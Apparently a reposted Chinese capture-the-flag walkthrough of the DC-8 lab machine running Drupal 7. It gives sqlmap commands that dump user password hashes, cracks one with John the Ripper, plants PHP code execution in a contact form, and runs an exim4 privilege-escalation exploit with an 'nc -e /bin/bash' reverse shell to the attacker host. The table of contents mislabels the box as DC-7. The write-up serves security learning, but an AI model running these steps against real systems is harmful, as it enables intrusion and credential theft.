目錄

DC-7靶機(jī)滲透測(cè)試

1、信息收集

1.1 掃描DC-8開放端口

1.2 訪問(wèn)WEB站點(diǎn)

2、滲透過(guò)程

2.1 用Sqlmap自動(dòng)化工具注入

2.2 drush 命令對(duì)任意用戶密碼進(jìn)行更改（發(fā)現(xiàn)沒有進(jìn)到DC-8的shell，行不通）

2.3 John爆破用戶名和密碼

2.3 用john用戶的密碼turtle登錄后臺(tái)

3、GetShell（利用php代碼執(zhí)行漏洞）

4、提權(quán)

4.1 exim4提權(quán)

---

?

DC-8靶機(jī)滲透測(cè)試

實(shí)驗(yàn)環(huán)境：

kali的IP地址：192.168.43.121
DC-8的MAC地址：00:0C:29:6F:4B:D3（192.168.43.33）

1、信息收集

1.1 掃描DC-8開放端口

得知開放了22端口和80端口、是一個(gè)Drupal 7 cms管理系統(tǒng)。

1.2 訪問(wèn)WEB站點(diǎn)

各個(gè)選項(xiàng)卡點(diǎn)開看看，發(fā)現(xiàn)可能存在SQL注入漏洞

?

2、滲透過(guò)程

2.1 用Sqlmap自動(dòng)化工具注入

sqlmap -u "http://192.168.43.33/?nid=1" --batch ? （檢測(cè)注入點(diǎn)）

sqlmap -u "http://192.168.43.33/?nid=1" --dbs（列出所有數(shù)據(jù)庫(kù)名字）

sqlmap -u "http://192.168.43.33/?nid=1" --current-db （列出當(dāng)前數(shù)據(jù)庫(kù)的名字：'d7db'）

sqlmap -u "http://192.168.43.33/?nid=1"? -D "d7db" --tables（-D指定數(shù)據(jù)庫(kù)，--tables列出表名，發(fā)現(xiàn)users表）

sqlmap -u "http://192.168.43.33/?nid=1"? -D "d7db" -T "users" --columns（-T指定表名，--columns列出所有字段，對(duì)pass字段和name字段比較感興趣）

sqlmap -u "http://192.168.43.33/?nid=1"?-D "d7db" -T "users" -C "pass/name" --dump （-C指定列名，--dump列出字段內(nèi)容）

?

發(fā)現(xiàn)存在admin和john這兩個(gè)用戶
admin的密碼加密后為：$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john的密碼加密后為：$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

2.2 drush 命令對(duì)任意用戶密碼進(jìn)行更改（發(fā)現(xiàn)沒有進(jìn)到DC-8的shell，行不通）

drush是drupal shell專門管理drupal站點(diǎn)的shell

嘗試對(duì)admin用戶的密碼做更改！

drupal中用drush更改密碼的命令：
$ drush user:password admin "123456"
或者：$drush user-password admin --password="123456"

2.3 John爆破用戶名和密碼

著名密碼破解利器John the Ripper（使用：https://www.jianshu.com/p/5ee11fb0414e）

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
將上述密文寫到一個(gè)文件里面：vim drupal_v7_admin_hash.txt

john drupal_v7_admin_hash.txt??? 跑了好久沒有解出密碼

發(fā)現(xiàn)admin的hash并沒有解出，再將john用戶的hash放入到drupal_v7_john_hash.txt文件中,用john再默認(rèn)跑一下
vim drupal_v7_john_hash.txt
得到j(luò)ohn密碼為turtle

注意vim的時(shí)候復(fù)制完密文后一定要檢查對(duì)不對(duì)

現(xiàn)在知道數(shù)據(jù)庫(kù)dbd7的john用戶的密碼為turtle

2.3 用john用戶的密碼turtle登錄后臺(tái)

查看robots.txt

?

發(fā)現(xiàn)/user/login好像是登錄后臺(tái)的界面，登錄成功

3、GetShell（利用php代碼執(zhí)行漏洞）

在john的登錄界面到處看看，終于在Contact Us界面找到了寫shell的地方

再Contact Us發(fā)現(xiàn)php代碼執(zhí)行漏洞

該漏洞在表單提交時(shí)才會(huì)觸發(fā)

這里自帶的格式不要?jiǎng)h除，否者會(huì)后端讀取的時(shí)候會(huì)報(bào)錯(cuò)導(dǎo)致無(wú)法執(zhí)行php代碼！！！（否則getshell會(huì)不成功）

save之后 回到VIEW界面

提交表單（在此之前需要監(jiān)聽對(duì)應(yīng)端口）【在kali上nc -lvvp 8888】

成功getshell！

進(jìn)入交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

4、提權(quán)

思路1、sudo -l（需要密碼，執(zhí)行不通X）

思路2、查看有沒有一些具有suid權(quán)限的命令

find / -perm /4000 2>dev/null

4.1 exim4提權(quán)

4.1.1 查看exim4版本

/usr/sbin/exim4 --version

發(fā)現(xiàn)版本是4.89

4.1.2 使用searchsploit查找響應(yīng)漏洞

searchsploit exim 4.

?Local Privilege Escalation（本地特權(quán)升級(jí)）

4.1.3 將響應(yīng)漏洞拷貝到靶機(jī)

scp遠(yuǎn)程拷貝

??? 把它弄到靶機(jī)里，使用scp：
??? 需要先在kali開啟ssh服務(wù)------Kali ssh服務(wù)
$ scp root@192.168.43.121:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/? （在dc8user@dc-8:~$下拷貝）

確認(rèn)已經(jīng)拷過(guò)來(lái)了

運(yùn)行EXP：

有個(gè)^M，查看此exp后，看到結(jié)尾都是M，百度后的文章：
解決“/bin/bash^M: bad interpreter: No such file or directory”
sed -i "s/\r//" 46996.sh

重新執(zhí)行exp，先監(jiān)聽kali上的8888端口：
./46996.sh -m netcat
nc -e /bin/bash 192.168.43.121 8888

這里很快就會(huì)斷鏈了，所以要快點(diǎn)！！！：
python -c 'import pty;pty.spawn("/bin/bash")'

到/root下發(fā)現(xiàn)有flag.txt

?

總結(jié)

以上是生活随笔為你收集整理的【CyberSecurityLearning 77】DC系列之DC-8渗透测试（Drupal）的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。